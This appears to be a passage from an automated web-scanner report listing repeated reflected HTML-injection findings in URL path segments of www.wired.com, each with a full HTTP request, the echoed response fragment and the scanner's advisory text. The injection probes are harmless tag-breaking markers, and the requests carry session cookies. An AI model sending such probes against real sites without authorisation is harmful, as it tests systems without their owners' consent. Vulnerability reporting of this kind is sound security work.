Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:23:25 GMT
Date: Sun, 21 Nov 2010 23:13:25 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news3a30c"><a>b820a999ffb"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2189"><a>e200d456324 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /scienceb2189"><a>e200d456324/discoveries/news/2006/04/70701 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:58 GMT
Date: Sun, 21 Nov 2010 23:12:58 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_scienceb2189"><a>e200d456324 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fddd"><a>532487198c1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries3fddd"><a>532487198c1/news/2006/04/70701 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:23:18 GMT
Date: Sun, 21 Nov 2010 23:13:18 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries3fddd"><a>532487198c1 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ba0f"><a>521893294d7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news6ba0f"><a>521893294d7/2006/04/70701 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:23:31 GMT
Date: Sun, 21 Nov 2010 23:13:31 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news6ba0f"><a>521893294d7"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e52a"><a>266a89d6056 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science6e52a"><a>266a89d6056/discoveries/news/2007/02/72573 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:10 GMT
Date: Sun, 21 Nov 2010 23:10:10 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science6e52a"><a>266a89d6056 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33c3b"><a>4f568f221b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries33c3b"><a>4f568f221b1/news/2007/02/72573 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:36 GMT
Date: Sun, 21 Nov 2010 23:10:36 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries33c3b"><a>4f568f221b1 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4ce8"><a>7d46a6a8f6b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/newsb4ce8"><a>7d46a6a8f6b/2007/02/72573 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:47 GMT
Date: Sun, 21 Nov 2010 23:10:47 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_newsb4ce8"><a>7d46a6a8f6b"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2186"><a>2b24d914e5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /sciencef2186"><a>2b24d914e5/discoveries/news/2007/02/72649 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29310
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:09 GMT
Date: Sun, 21 Nov 2010 23:10:09 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_sciencef2186"><a>2b24d914e5 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7be0f"><a>71f4beaefd6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries7be0f"><a>71f4beaefd6/news/2007/02/72649 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:36 GMT
Date: Sun, 21 Nov 2010 23:10:36 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries7be0f"><a>71f4beaefd6 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 423ae"><a>3fe3a67e3bd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news423ae"><a>3fe3a67e3bd/2007/02/72649 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:47 GMT
Date: Sun, 21 Nov 2010 23:10:47 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news423ae"><a>3fe3a67e3bd"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9720"><a>e9f4d710ca3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /scienceb9720"><a>e9f4d710ca3/discoveries/news/2007/03/72723 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:57 GMT
Date: Sun, 21 Nov 2010 23:10:57 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_scienceb9720"><a>e9f4d710ca3 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee3a7"><a>2240bc5bf26 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveriesee3a7"><a>2240bc5bf26/news/2007/03/72723 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:17 GMT
Date: Sun, 21 Nov 2010 23:11:17 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveriesee3a7"><a>2240bc5bf26 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e7bf"><a>a0ed15676db was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news6e7bf"><a>a0ed15676db/2007/03/72723 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:29 GMT
Date: Sun, 21 Nov 2010 23:11:29 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news6e7bf"><a>a0ed15676db">
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe9ae"><a>f527668027f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /sciencefe9ae"><a>f527668027f/discoveries/news/2007/03/72805 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:56 GMT
Date: Sun, 21 Nov 2010 23:10:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_sciencefe9ae"><a>f527668027f ss_discoveries c_news">
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e162"><a>7810533295 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries7e162"><a>7810533295/news/2007/03/72805 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29310
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:13 GMT
Date: Sun, 21 Nov 2010 23:11:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries7e162"><a>7810533295 c_news">
...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8058d"><a>0c1616ffa46 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news8058d"><a>0c1616ffa46/2007/03/72805 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:23 GMT
Date: Sun, 21 Nov 2010 23:11:23 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news8058d"><a>0c1616ffa46">
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2776e"><a>2cf882d2876 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science2776e"><a>2cf882d2876/discoveries/news/2007/04/dayintech_0408 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:38 GMT
Date: Sun, 21 Nov 2010 23:09:38 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science2776e"><a>2cf882d2876 ss_discoveries c_news">
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94cdc"><a>0cc65881279 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries94cdc"><a>0cc65881279/news/2007/04/dayintech_0408 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:07 GMT
Date: Sun, 21 Nov 2010 23:10:07 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries94cdc"><a>0cc65881279 c_news">
